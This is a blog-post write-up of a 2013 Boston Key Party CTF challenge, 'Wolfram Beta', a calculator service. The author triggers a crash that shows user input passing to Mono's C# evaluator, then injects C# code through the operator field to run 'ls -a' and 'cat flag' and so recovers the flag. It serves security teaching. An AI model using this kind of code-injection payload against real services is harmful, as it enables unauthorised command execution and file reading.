Tuesday, June 11, 2013

Boston Key Party CTF 2013 - Misc 100 - Wolfram Beta - [Team xbios]

Wolfram Beta is a calculator service running on 54.218.12.97 34567.
[ctf@renorobert BKPCTF]$ nc 54.218.12.97 34567
Wolfram Beta - BkP CTF 2013 Team
Wolfram Beta is a great calculator.
just put in a number at the prompt
then put in the operator
then finally the second number
and the calculation will be done INSTANTLY
no accounts necessacary, unlike some of our competition!
first num: 1
operator: +
second num: 2
Thinking...
......
Done Thinking!
3
Triggering a crash gives valuable information about the service. Here is what division by zero gave:
first num: 1
operator: /
second num: 0
Thinking...
.......
Done Thinking!
{interactive}(1,3): error CS0020: Division by constant zero

Unhandled Exception: System.ArgumentException: The expression did not set a result
  at Mono.CSharp.Evaluator.Evaluate (System.String input) [0x00000] in <filename unknown>:0 
  at wolfram_beta.MainClass.ReplCalculator () [0x00000] in <filename unknown>:0 
  at wolfram_beta.MainClass.Main (System.String[] args) [0x00000] in <filename unknown>:0 
[ERROR] FATAL UNHANDLED EXCEPTION: System.ArgumentException: The expression did not set a result
  at Mono.CSharp.Evaluator.Evaluate (System.String input) [0x00000] in <filename unknown>:0 
  at wolfram_beta.MainClass.ReplCalculator () [0x00000] in <filename unknown>:0 
  at wolfram_beta.MainClass.Main (System.String[] args) [0x00000] in <filename unknown>:0
An Unhandled Exception is triggered. We can see the line Mono.CSharp.Evaluator.Evaluate. Now we know that the service is written in CSharp. The user input is evaluated as Mono.CSharp.Evaluator.Evaluate (System.String input). This results in code injection vulnerability
first num: 1
operator: +3;System.Diagnostics.Process proc=new System.Diagnostics.Process();proc.StartInfo.FileName="ls";proc.StartInfo.Arguments="-a";proc.Start();
second num: 5
Thinking...
.
Done Thinking!
5
first num: .
..
.bash_history
.bash_logout
.bashrc
.profile
b
flag
first num: 1
operator: +3;System.Diagnostics.Process proc=new System.Diagnostics.Process();proc.StartInfo.FileName="cat";proc.StartInfo.Arguments="flag";proc.Start();
second num: 5
Thinking...
..
Done Thinking!
5
first num: at_least_its_not_a_python_jail 
Flag for the challenge is at_least_its_not_a_python_jail

No comments :

Post a Comment